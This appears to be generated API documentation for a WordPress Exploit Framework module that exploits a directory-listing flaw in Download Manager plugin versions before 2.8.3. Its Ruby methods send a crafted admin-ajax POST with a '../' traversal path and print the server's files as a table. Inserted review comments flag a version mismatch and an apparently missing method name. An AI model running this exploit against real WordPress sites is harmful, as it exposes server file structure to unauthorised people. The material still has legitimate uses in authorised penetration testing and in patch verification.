Class: Wpxf::Auxiliary::DownloadManagerDirectoryListingDisclosure
- Includes:
- ERB::Util, Wpxf
- Defined in:
- lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #encoded_remote_path ⇒ Object
-
#initialize ⇒ DownloadManagerDirectoryListingDisclosure
constructor
A new instance of DownloadManagerDirectoryListingDisclosure.
- #remote_path ⇒ Object
- #run ⇒ Object
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ DownloadManagerDirectoryListingDisclosure
Returns a new instance of DownloadManagerDirectoryListingDisclosure.
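# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 10

# Sets the module metadata and registers the single `remote_path` option.
#
# The description below scopes the issue to Download Manager versions
# < 2.8.3 and attributes it to missing session and input validation.
# NOTE(review): the reference URL slug mentions 2.8.8 while the description
# and #check use 2.8.3 -- confirm the fixed version against the advisory
# before relying on either number for patch verification.
#
# @return [DownloadManagerDirectoryListingDisclosure] a new instance
def initialize
  super

  update_info(
    name: 'Download Manager Directory Listing Disclosure',
    desc: %(
      This module uses a lack of session and input validation in versions
      < 2.8.3 of the Download Manager plugin to get the directory listing
      of the specified directory.
    ),
    author: [
      'James Golovich', # Disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8365'],
      ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities']
    ],
    date: 'Jan 19 2016'
  )

  # The rendered listing lost the method name in front of this argument
  # list, leaving a bare parenthesised array that registers nothing.
  # register_options (listed among the methods included from Options) is
  # presumably the intended call -- verify against the repository file.
  register_options([
    StringOption.new(
      name: 'remote_path',
      desc: 'The relative or absolute path to view the contents of',
      required: true,
      default: '../'
    )
  ])
end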
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 41

# Runs the shared readme-based version check for the Download Manager plugin.
#
# Passes the plugin slug and the version string '2.8.3' to
# check_plugin_version_from_readme (from WordPress::Fingerprint).
# NOTE(review): presumably '2.8.3' is treated as the first fixed version,
# matching the "< 2.8.3" wording in the module description -- confirm in the
# helper.
#
# @return [Object] whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'download-manager'
  version_marker = '2.8.3'
  check_plugin_version_from_readme(plugin_slug, version_marker)
end
#encoded_remote_path ⇒ Object
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 53

# Returns #remote_path passed through url_encode (the class includes
# ERB::Util).
#
# NOTE(review): #run places this value in a POST body hash; whether the HTTP
# client encodes it a second time is not visible here.
#
# @return [String] the URL-encoded, slash-terminated path
def encoded_remote_path
  normalized_path = remote_path
  url_encode(normalized_path)
end
#remote_path ⇒ Object
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 45

# Returns the configured 'remote_path' option, guaranteed to end in '/'.
#
# The value is returned untouched when it already ends with a slash;
# otherwise a new string with one appended slash is built. No other
# normalisation or validation is applied to the operator-supplied value.
#
# @return [String] the slash-terminated path
def remote_path
  configured = datastore['remote_path']
  return configured if configured.end_with?('/')

  "#{configured}/"
end
#run ⇒ Object
# File 'lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb', line 57

# Requests a directory listing through the plugin's AJAX handler and prints
# the parsed entries as a table.
#
# One POST is sent to wordpress_url_admin_ajax with the parameters
# action=wpdm_init and task=wpdm_dir_tree, and a `dir` body field holding
# the encoded path. Those two parameter values are the stable markers of this
# request for anyone reviewing server-side logs or writing a filtering rule.
# NOTE(review): whether `params` end up in the query string depends on
# execute_post_request, which is not shown here.
#
# Every <li> below a <ul> in the response becomes one row: its first <a>
# supplies the name, and a class attribute matching /directory/ marks it as a
# directory. An <li> without an <a> raises inside the loop, which is caught
# by the rescue and aborts the whole listing.
#
# NOTE(review): entry names come from the remote response and are handed to
# emit_table unmodified; confirm that emit_table neutralises control
# characters before they reach the operator's terminal.
#
# @return [Boolean] true once the table was emitted; false when super is
#   falsy, no response arrived, the status is not 200, or parsing raised
def run
  return false unless super

  emit_info 'Requesting directory listing...'
  response = execute_post_request(
    url: wordpress_url_admin_ajax,
    params: { 'action' => 'wpdm_init', 'task' => 'wpdm_dir_tree' },
    body: { 'dir' => encoded_remote_path }
  )

  if response.nil?
    emit_error 'No response from the target'
    return false
  end

  unless response.code == 200
    emit_error "Server responded with code #{response.code}"
    return false
  end

  emit_info 'Parsing response...'
  # The first row doubles as the table header.
  rows = [{ name: 'Name', type: 'Type' }]

  begin
    Nokogiri::HTML(response.body).xpath('//ul//li').each do |entry|
      kind = entry['class'] =~ /directory/ ? 'Directory' : 'File'
      rows << { name: entry.at('a').text, type: kind }
    end
  rescue StandardError => e
    emit_error "Could not parse the response: #{e}"
    return false
  end

  emit_table rows
  true
end